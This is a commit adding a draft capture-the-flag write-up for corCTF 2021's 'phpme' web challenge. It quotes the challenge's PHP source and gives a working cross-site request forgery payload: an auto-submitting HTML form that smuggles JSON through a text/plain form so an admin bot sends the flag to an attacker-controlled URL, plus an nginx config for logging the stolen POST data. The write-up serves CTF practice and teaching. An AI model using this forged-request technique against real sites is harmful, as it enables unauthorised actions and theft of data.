2021: corctf: draft work on phpme
This commit is contained in:
parent
f80d51be40
commit
b1db324231
|
|
@ -0,0 +1,94 @@
|
|||
# DRAFT : NOT FINISHED
|
||||
|
||||
# phpme
|
||||
|
||||
by [5225225](https://www.5snb.club) and haskal
|
||||
|
||||
web / 469 pts / 64 solves
|
||||
|
||||
> "This is what normal PHP CTF challenges look like, right?" - A web dev who barely knows PHP
|
||||
|
||||
Going to the URL given shows us this source code
|
||||
|
||||
```php
|
||||
<?php
|
||||
include "secret.php";
|
||||
|
||||
// https://stackoverflow.com/a/6041773
|
||||
function isJSON($string) {
|
||||
json_decode($string);
|
||||
return json_last_error() === JSON_ERROR_NONE;
|
||||
}
|
||||
|
||||
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
|
||||
if(isset($_COOKIE['secret']) && $_COOKIE['secret'] === $secret) {
|
||||
// https://stackoverflow.com/a/7084677
|
||||
$body = file_get_contents('php://input');
|
||||
if(isJSON($body) && is_object(json_decode($body))) {
|
||||
$json = json_decode($body, true);
|
||||
if(isset($json["yep"]) && $json["yep"] === "yep yep yep" && isset($json["url"])) {
|
||||
echo "<script>\n";
|
||||
echo " let url = '" . htmlspecialchars($json["url"]) . "';\n";
|
||||
echo " navigator.sendBeacon(url, '" . htmlspecialchars($flag) . "');\n";
|
||||
echo "</script>\n";
|
||||
}
|
||||
else {
|
||||
echo "nope :)";
|
||||
}
|
||||
}
|
||||
else {
|
||||
echo "not json bro";
|
||||
}
|
||||
}
|
||||
else {
|
||||
echo "ur not admin!!!";
|
||||
}
|
||||
}
|
||||
else {
|
||||
show_source(__FILE__);
|
||||
}
|
||||
?>
|
||||
```
|
||||
|
||||
The challenge is to get the admin bot to visit a URL and make a POST request
|
||||
without user interaction, and then receive the flag back as a POST to the url
|
||||
given.
|
||||
|
||||
The easiest way to do this is with a form. One issue is that form submission is
|
||||
submitting key/value pairs, but we need to submit valid JSON. [System Overlord
|
||||
- Posting JSON with an HTML
|
||||
Form](https://systemoverlord.com/2016/08/24/posting-json-with-an-html-form.html)
|
||||
was useful here.
|
||||
|
||||
The final solution was
|
||||
|
||||
```html
|
||||
<body onload='document.forms[0].submit()'>
|
||||
<form action='https://phpme.be.ax/' method='POST' enctype='text/plain'>
|
||||
<input name='{"yep":"yep yep yep", "url":"<URL>", "trash": "' value='"}'>
|
||||
</form>
|
||||
</body>
|
||||
```
|
||||
|
||||
with `<URL>` replaced with some URL that can receive POST requests.
|
||||
|
||||
I (522) didn't have an easy setup to receive the values of post requests, so
|
||||
I got haskal to set up nginx to log the values of POST data, then look through
|
||||
their logs. There's most definitely cleaner ways to do this, but this worked!
|
||||
|
||||
For future reference, the nginx directive to log POSTed data is
|
||||
|
||||
```nginx
|
||||
log_format postdata $request_body;
|
||||
|
||||
server {
|
||||
location /flagzone {
|
||||
access_log /var/log/nginx/flags.log postdata;
|
||||
echo_read_request_body;
|
||||
# ...
|
||||
}
|
||||
# ...
|
||||
}
|
||||
```
|
||||
|
||||
Once you get the data back, you can simply submit the flag and you're done!
|
||||
Loading…
Reference in New Issue